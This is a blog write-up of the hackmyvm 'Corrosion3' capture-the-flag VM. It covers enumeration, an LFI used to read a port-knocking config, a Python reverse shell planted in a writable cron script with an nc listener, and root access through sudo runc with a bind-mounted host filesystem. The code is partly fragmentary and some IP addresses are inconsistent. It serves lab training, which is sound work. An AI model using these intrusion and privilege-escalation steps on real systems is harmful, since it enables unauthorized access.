The free CTF Challenge web site “hackmyvm.eu” have an other medium level vm called ‘Corrosion3‘ for us to download, enumerate and get some flags. I enjoyed this challenge as it made me learn some new stuff about containers. In this write-up I try to describe my method and thought process on how I completed this hackmyvm corrosion3 challenge.
Lets get into it.
Setup for hackmyvm Corrosion3
The vm can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.
- 192.168.186.150 – This is my BlackArch enumeration system.
- 192.168.186.24 – This is the Corrosion3 vm.
For enumeration of the hackmyvm Corrossion3 Challenge I will be using my BackArch system build that I created in previous blog post. You can use any Kali, BlackArch, Parrot or just standard Linux to proceed.
Enumeration of Corrosion3
As usual nmap should be used to scan down everything.
nmap -p- -T5 192.168.186.24
So we have some open ports. Port 80 (http webserver) and port 22 (ssh). SSH port is not much good right now because we need a username and password. However we will remember this port is open for later.
Something I only discovered a review of this room for a video is that ssh is not shown as open by default. There is a port knocker installed. I unlocked it by accident with the full nmap scan. In order to open a port knocker you need to know what the ports are and the order in which to knock on them. This requires that you get to read the port knocker configuration file “/etc/knockd.conf” on the system. the only way to do this is that there must be a LFI bug somewhere in the web page.
Digging into Port 80
If we open port 80 up in firefox we find the default page for ubuntus apache.
Nothing much of use here. I always take a look at the html code when I see a page like this but there was nothing to see this time.
As always, when I see this page, my next step is to run a web content scanner. There are multiple approaches here but I always start with the simplest and fastest and build on it.
You can see that there is a website running under the /website folder or you can take a look at the much more interesting logs folder at http:/192.168.186.22/website/logs
I won’t open them here, but if you take a look at these you will find some useful information need to proceed.
On my first round I missed the knocker so I will do a deeper dive with with the gobuster content scanner. I had some success with just searching for php pages. I found something I missed first time around. The page “sales_details.php”
LFI and /etc/knockd.conf
Opening the page in a browser and it is blank.
Suspicious! I know there must be something and did some scan of it and found a LFI vulnerability.
wfuzz -c --hh=0 -w common.txt \
This part is a pain as you have to think of a list of files you should check, one at a time, when you have an LFI vulnerability. I tend to have a list I will try to check, ssh keys, /etc/password, etc. Now I will add /etc/knockd.conf.
Contents of the knockd config file are.
so the ports and order are 1110, 2220 and 3330 and a time out of 20 seconds.
So nmap it is, nmap can run ports in random order to better to do it one at a time.
nmap -p 1110 192.168.186.10
nmap -p 2220 192.168.186.10
nmap -p 3330 192.168.186.10
And now you have 20 seconds to connect with the username and password from earlier.
System Access and Review
So using the information we got from the previous step we can now ssh to the system with user randy. After a quick look around the system I identified the following information to focus on.
- There is another user on the system called bob.
- In the users bob home directory there is a file called user.txt. This must be the user flag file.
- The userbob has a cronjob called /opt/simpleurlencode.py that runs every 2 minutes.
- I ran the enumeration script LINpeas.sh and nothing else of value showed up.
Getting the User flag.
So looks like we have to somehow get to the user bob and get the first flag.
As there is a cronjob running under the username bob every few min. Lets take a look at the file.
Ok, so the permissions on this file are wide open and the contents can be modified by my current user “randy”. The best move forward here is to edit the file to spawn a reverse shell the next time cron runs it. As the script is already in python, I will use python for the reverse shell. The code is below, be sure to update the ip to match your own enumeration system.
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
Before you run this you have have to have netcat running in a new terminal on your enumeration system on port 1234
nc -nlvp 1234
So let cron do its thing and after a couple of minutes the terminal that you had netcat running, should spawn a shell running as the user bob.
Now you can out the user.txt flag and validate it on hackmyvm.eu.
Getting the root Flag
Ok so now we have the shell for user bob, let’s see what we can do. First thing I always do is to run “sudo -l” and as luck would have it we have some options.
We can run “/usr/sbin/runc” as root user.
This is great as runc is a service for running containers. Running containers as root means we can add some interesting mount points, or binds, into a container that we create. For example what would happen if we created a container and mapped the real “/” file system into the container as its “/”.
Then we could just create that new container and be automatically logged into as root. And as the real “/” is mapped to the container it would give use root access to the real file system. Loopy I know but it works in most container technologies like “Docker“.
Let do it.
Make a directory structure for our new container.
mkdir -p container01/rootfs
Initialize a new specification file for our new empty container.
Now we have a new spec file for our runc container.
So using vim you have to open this file and place the following code into the top of “mount” section.
"options": [ "rbind", "rw", "rprivate" ]
It should look something like
Lets run the container with sudo and see what we get.
sudo /usr/sbin/runc run mycont
Double bingo, we are root! Now you can grab anything you need . All the flags are available and you can reset the root password if you want to have full access to the main host.
You see the runc exploit in action in the first part of my short youtube video below.
Another great box from hackmyvm.eu. They are really staring to become one of my favorite CTF Challenge vms. This one made me go out and learn about “runc“. “Docker” is a technology that I am familiar with but I never used “runc” directly so this was a great learning experience for me.
I hope you enjoyed my write-up of how to do this CTF Corrosion3 and if you have any questions or comments, drop them below.